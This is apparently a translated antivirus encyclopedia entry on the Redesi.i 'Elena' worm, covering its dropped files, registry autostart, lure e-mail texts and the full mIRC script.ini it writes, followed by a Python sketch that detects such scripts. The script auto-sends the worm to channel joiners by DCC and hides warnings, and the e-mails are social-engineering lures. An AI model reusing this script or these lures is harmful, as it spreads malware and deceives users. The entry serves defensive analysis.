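Overview
Virus aliases: I-Worm.Redesi.i [AVP], I-Worm/Redesi.i [KV], Worm.Redesi.i [RS]
Processing time:
Threat level: ★★
Chinese name: Red Ribbon variant I (紅絲帶變種I)
Virus behavior:
This is a worm that spreads through e-mail and the mIRC chat system. When it runs, it copies 7 copies of itself and 1 photo named "Elena" to the root of the C: drive, and adds a startup entry to the registry so that it starts automatically at boot. By modifying the contents of mIRC's script configuration file script.ini, it is able to spread through mIRC. The virus collects e-mail addresses from the Outlook Express address book and then sends itself out as an attachment. The e-mail is highly deceptive, so users are likely to be tricked into opening the attachment and become infected.
The 8 files dropped by the virus (7 virus copies and 1 photo of Elena):
1) The following files are dropped in the root of the C: drive:
C:\elena.jpg (a picture of a person)
C:\elena.scr (virus copy)
C:\YouandMe.exe (virus copy)
C:\Me.pif (virus copy)
C:\Mylove.pif (virus copy)
C:\myfullpicture.scr (virus copy)
C:\aboutme.exe (virus copy)
C:\you.exe (virus copy)
2) A startup entry is added to the registry: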
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
(Default)="C:\me.pif"
3) One of the following lines is used as the e-mail subject:
Hey baby !
She makes me feel alive her power more than words can say.
Sends Shivers through my person, clears my head to face the day.
Can't we sort this out ?
I was wrong, I'm sorry.
I know I was a bitch
We belong together
Can't resist, thats where we went wrong.
I hear the ocean beat upon the shore outside my room.
Calling me up from sleep to listen to her gracefull tune.
It's gonna be a lovely day.
Don't ask me what I smoke. But I drink to get drunk.
I kept watching the way you move.
Seaside Atmosphere.
Two people, barely tocuhing each other.
4) One of the following passages is used as the e-mail body:
Hey baby
Sorry I was such a bitch to you. Is there no way we can sort this out ?
The last few days have been hell without you... I miss you
I've attached a picture ... thought you might like it.
Please call me !
All my love. Elena
Hey darlin
I'll be home in a few days, can't wait to see you again ;-)
Attached a picture we took on Saturday at gatecrasher. Love ya
Elena =x=
Hi sexy.
Went to Gatecrasher on Saturday, it was absoultly brilliant !!!
here is a picture of me by the bar (as usual heh)
Be home tommorrow.
Love Elena
5) The following content is written to mIRC's script configuration file script.ini so that the virus can spread through mIRC:
[script]
n0= on 1:JOIN:#:{
n1= .msg $nick Hey. check out my picture and let me know what you think. Youll be pleasantly suprised.
n2= .copy C:\elena.scr C:\mirc\MyFullpic.jpg .pif
n3= .dcc send $nick C:\mirc\MyFullpic.jpg .pif
n4= }
n5= on 1:text:*script.ini*:?:/.ignore $nick
n6= on 1:text:*virus*:?:/.ignore $nick
n7= on 1:text:*worm*:?:/.ignore $nick
n8= on 1:text:*script.ini*:#:/.ignore $nick
n9= on 1:text:*virus*:#:/.ignore $nick
n10= on 1:text:*worm*:#:/.ignore $nick
n11=on 1:text:*redesi*:#:/nick Elena_MM
n12=on 1:text:*elena*:#:/nick I_got_worms
n13=on 1:text:*sex*:#:/nick Elena_worm
n14=on 1:text:*cyber*:#:/nick Win32_Elena
n14=on 1:text:*e*:#:/me Thinks Elena is stunning.
n14=on 1:text:*a*:#:/join #teamvirus
n14=on 1:text:*s*:#:/say my next worm will be called Zor probably :)
n14=on 1:text:*i*:#:/join #teamvirus
n14=on 1:text:*hey*:#:/say W32.Elena, by Gobo
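
The script.ini changes listed in item 5 can be checked for on a host. The following Python sketch is an added example, not part of the original entry: it scans script.ini text for a dcc send inside an on JOIN handler, a double file extension, and text events that ignore users who mention script.ini, virus or worm. The function name, the rule set and the embedded sample (constructed, trimmed from the listing above) are assumptions.

```python
import re

PREFIX = re.compile(r"^\s*n\d+\s*=\s*")          # mIRC "nN=" line prefix
EVENT = re.compile(r"^on\s+[^:]+:(\w+):", re.I)  # "on <level>:<EVENT>:"
DCC_SEND = re.compile(r"\bdcc\s+send\b", re.I)
# Executable extension hidden behind a harmless-looking one, e.g. "x.jpg .pif"
DOUBLE_EXT = re.compile(
    r"\.(?:jpg|jpeg|gif|txt|doc)\s*\.(?:pif|scr|exe|com|bat|vbs)\b", re.I)
# Match patterns used to silence anyone who mentions the infection
WARN_WORDS = re.compile(r"\*(?:script\.ini|virus|worm)\*", re.I)

# Constructed sample, trimmed from the listing in item 5
SAMPLE = r"""[script]
n0= on 1:JOIN:#:{
n1= .msg $nick hello
n2= .copy C:\elena.scr C:\mirc\MyFullpic.jpg .pif
n3= .dcc send $nick C:\mirc\MyFullpic.jpg .pif
n4= }
n5= on 1:text:*virus*:?:/.ignore $nick
n6= on 1:text:!hello:#:/msg $chan hi
"""


def scan_script_ini(text):
    """Return (line_number, finding) tuples for suspicious script.ini lines."""
    findings = []
    event, depth = None, 0  # current event handler and its brace depth
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = PREFIX.sub("", raw).strip()
        m = EVENT.match(line)
        if m:
            event = m.group(1).upper()
        if event == "JOIN" and DCC_SEND.search(line):
            findings.append((lineno, "dcc send inside on JOIN handler"))
        if DOUBLE_EXT.search(line):
            findings.append((lineno, "double file extension"))
        if event == "TEXT" and WARN_WORDS.search(line) and "ignore" in line.lower():
            findings.append((lineno, "ignores users who mention the infection"))
        depth += line.count("{") - line.count("}")
        if depth <= 0:
            event, depth = None, 0  # handler closed, or it was a one-liner
    return findings


if __name__ == "__main__":
    for lineno, finding in scan_script_ini(SAMPLE):
        print(f"line {lineno}: {finding}")
```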